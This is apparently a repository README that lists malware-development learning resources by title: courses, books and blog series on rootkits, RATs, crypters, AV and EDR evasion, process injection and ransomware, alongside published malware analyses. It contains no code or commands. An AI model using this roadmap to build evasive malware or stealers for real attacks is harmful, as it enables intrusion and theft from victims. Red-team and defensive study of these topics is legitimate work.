⠀⠀⠀⠀⠀⣠⣴⣶⣿⣿⠿⣷⣶⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣶⣷⠿⣿⣿⣶⣦⣀⠀⠀⠀⠀⠀ ⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣶⣦⣬⡉⠒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠚⢉⣥⣴⣾⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀ ⠀⠀⠀⡾⠿⠛⠛⠛⠛⠿⢿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⣿⣿⣿⠿⠿⠛⠛⠛⠛⠿⢧⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⣿⡿⠟⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⣠⣤⠶⠶⠶⠰⠦⣤⣀⠀⠙⣷⠀⠀⠀⠀⠀⠀⠀⢠⡿⠋⢀⣀⣤⢴⠆⠲⠶⠶⣤⣄⠀⠀⠀⠀⠀⠀⠀ ⠀⠘⣆⠀⠀⢠⣾⣫⣶⣾⣿⣿⣿⣿⣷⣯⣿⣦⠈⠃⡇⠀⠀⠀⠀⢸⠘⢁⣶⣿⣵⣾⣿⣿⣿⣿⣷⣦⣝⣷⡄⠀⠀⡰⠂⠀ ⠀⠀⣨⣷⣶⣿⣧⣛⣛⠿⠿⣿⢿⣿⣿⣛⣿⡿⠀⠀⡇⠀⠀⠀⠀⢸⠀⠈⢿⣟⣛⠿⢿⡿⢿⢿⢿⣛⣫⣼⡿⣶⣾⣅⡀⠀ ⢀⡼⠋⠁⠀⠀⠈⠉⠛⠛⠻⠟⠸⠛⠋⠉⠁⠀⠀⢸⡇⠀⠀⠄⠀⢸⡄⠀⠀⠈⠉⠙⠛⠃⠻⠛⠛⠛⠉⠁⠀⠀⠈⠙⢧⡀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⡇⢠⠀⠀⠀⢸⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡇⠀⠀⠀⠀⢸⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠟⠁⣿⠇⠀⠀⠀⠀⢸⡇⠙⢿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠰⣄⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⠖⡾⠁⠀⠀⣿⠀⠀⠀⠀⠀⠘⣿⠀⠀⠙⡇⢸⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠄⠀ ⠀⠀⢻⣷⡦⣤⣤⣤⡴⠶⠿⠛⠉⠁⠀⢳⠀⢠⡀⢿⣀⠀⠀⠀⠀⣠⡟⢀⣀⢠⠇⠀⠈⠙⠛⠷⠶⢦⣤⣤⣤⢴⣾⡏⠀⠀ ⠀⠀⠈⣿⣧⠙⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⢊⣙⠛⠒⠒⢛⣋⡚⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⡿⠁⣾⡿⠀⠀⠀ ⠀⠀⠀⠘⣿⣇⠈⢿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡿⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⡟⠁⣼⡿⠁⠀⠀⠀ ⠀⠀⠀⠀⠘⣿⣦⠀⠻⣿⣷⣦⣤⣤⣶⣶⣶⣿⣿⣿⣿⠏⠀⠀⠻⣿⣿⣿⣿⣶⣶⣶⣦⣤⣴⣿⣿⠏⢀⣼⡿⠁⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠘⢿⣷⣄⠙⠻⠿⠿⠿⠿⠿⢿⣿⣿⣿⣁⣀⣀⣀⣀⣙⣿⣿⣿⠿⠿⠿⠿⠿⠿⠟⠁⣠⣿⡿⠁⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠈⠻⣯⠙⢦⣀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀⣠⠴⢋⣾⠟⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠙⢧⡀⠈⠉⠒⠀⠀⠀⠀⠀⠀⣀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠐⠒⠉⠁⢀⡾⠃⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠳⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠀⣠⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢦⡀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢀⡴⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
This Repo serves as a list of resources for malware development. Note: I am just a learner what i have im sharing some reources can be stupid, you can help me adding things.
I would say having some experience with C and assembly going to be good. some resources for C and assmebly.
- C for Everyone: Programming Fundamentals
- learn-c
- C cheatsheet
- Architecture 1001: x86-64 Assembly
- x86 Assembly
Lot's of Malware related content.
Have an amazing malware development series i would recommend to take a look.
Some good posts.
Dope Maldev Content.
Amazing LKM rookit series and maldev posts.
Horse Pill: A New Type of Linux Rootkit
Not a talk but good LKM rootkit series
Good talk on Creating and Countering the Next Generation of Linux Rootkits
Kernel Mode Threats and Practical Defenses
Alex Ionescu - Advancing the State of UEFI Bootkits
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
HQ Malware Content.
Have an amazing series on Writing your Rat from Scratch.
Amazing Malware stuff, have a good code injection series, Linux stuff.
Have a good LKM rootkit series.
There are some courses I would love to recommend.
RED TEAM Operator: Malware Development Essentials course | Sektor7
This course will teach you how to become a better ethical hacker, pentester and red teamer by learning malware development. It covers developing droppers, trojans and payload/DLL injectors using some basic C and Intel assembly skills.
RED TEAM Operator: Malware Development Intermediate course
Advanced malware development techniques in Windows, including: API hooking, 32-/64-bit migrations, reflective binaries and more.
RingZerø: Windows Kernel Rootkits: Techniques and Analysis
Key Learnings:
- Machine architecture for kernel programmers
- Virtual memory management
- Interrupts and exceptions
- CPU security features
- Windows kernel architecture
- Kernel components (Ps, Io, Mm, Ob, Se, Cm, etc.)
- System mechanisms
- Debugging with WinDbg
- Rootkit techniques
- Driver development
CodeMachine: Windows Kernel Rootkits
Topics:
- Kernel Attacks
- Kernel Shellcoding
- Kernel Hooking and Injection
- Kernel Callbacks
- Kernel Filtering
- Kernel Networking
- Virtualization Based Security
- The Art of Computer Virus Research and Defense
- The Giant Black Book of Computer Viruses
- Designing BSD Rootkits: An Introduction to Kernel Hacking
- Rootkits and Bootkits
- The Antivirus Hackers' Handbook
Make your own first fud crypter
Malware Development – Welcome to the Dark Side: Part 1
Art of Malware
Malware Development Part 1
Basic Ransomware guide
Understanding TRITON and the Missing Final Stage of the Attack good read.
Master of RATs - How to create your own Tracker
Amazing article to read with some good resources (Personal Tale and the Road to Malware Development, Resources)
PT_NOTE -> PT_LOAD x64 ELF virus written in Assembly
The magic of LD_PRELOAD for Userland Rootkits(good read if you wanna get into rootkits this blog is for userland rootkits)
(Recommended Read) if you want to creat your first userland rootkit and you just know C you can go for this blog if you wanna start into rootkit development
Function Hooking Part I: Hooking Shared Library Function Calls in Linux
Inline Hooking for Programmers (Part 1: Introduction)
Inline Hooking for Programmers (Part 2: Writing a Hooking Engine)
PE injection for beginners
Becoming-rat-your-system
Complete guide on LKM hacking
Best series i will say if you wanna get into programming/malware dev recommended series to follow it will start with learn programming thats needed asm and stuff after that getting into maldev
Filess malware
Examining the Morris Worm Source Code
IOT Malware
DoublePulsar SMB backdoor analysis
Eset Turla Outlook backdoor report
Writing a custom encoder
Engineering antivirus evasion
Analysis of Project Sauron APT
WastedLocker analysis
Lazarus shellcode execution
Detailed analysis of Zloader
BendyBear shellcode malware
A Basic Windows DKOM Rootkit
Loading Kernel Shellcode
Windows Kernel Shellcode on Windows 10 – Part 1
Windows Kernel Shellcode on Windows 10 – Part 2
Windows Kernel Shellcode on Windows 10 – Part 3
Introduction to Shellcode Development
Autochk Rootkit Analysis
pierogi backdoor
Pay2Kitten
STEELCORGI
Lebanese Cedar APT
LazyScripter
Maze deobfuscation
Darkside overview
SunBurst backdoor - FireEye analysis
Code obfuscation techniques
SideCopy APT tooling
Hiding in PEB sight: Custom loader
Zloader: New infection technique
FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines
A tale of EDR bypass methods
In-depth dive into the security features of the Intel/Windows platform secure boot process
Process Injection Techniques
Adventures with KernelCallbackTable Injection
Useful Libraries for Malware Development
Parent Process ID (PPID) Spoofing
Mutants Sessions Self Deletion
OffensiVe Security with V - Process Hollowing
Looking for Remote Code Execution bugs in the Linux kernel
memory-analysis-evasion
100% evasion - Write a crypter in any language to bypass AV
One of the best Malware Development fourms that helped me a lot.
A collection of source code for various RATs, Stealers, and other Trojans.
An example of hijacking the dynamic linker with a custom interpreter who loads and executes modular viruses.
A summary of linux rootkits published on GitHub.
Collection of ancient computer virus source codes.
FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware.
Ebpfkit is a rootkit powered by eBPF.
Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection.
Evasions encyclopedia gathers methods used by malware to evade detection when run in virtualized environment.
System call hooking on arm64 linux via a variety of methods.
A curated list of awesome resources related to executable packing.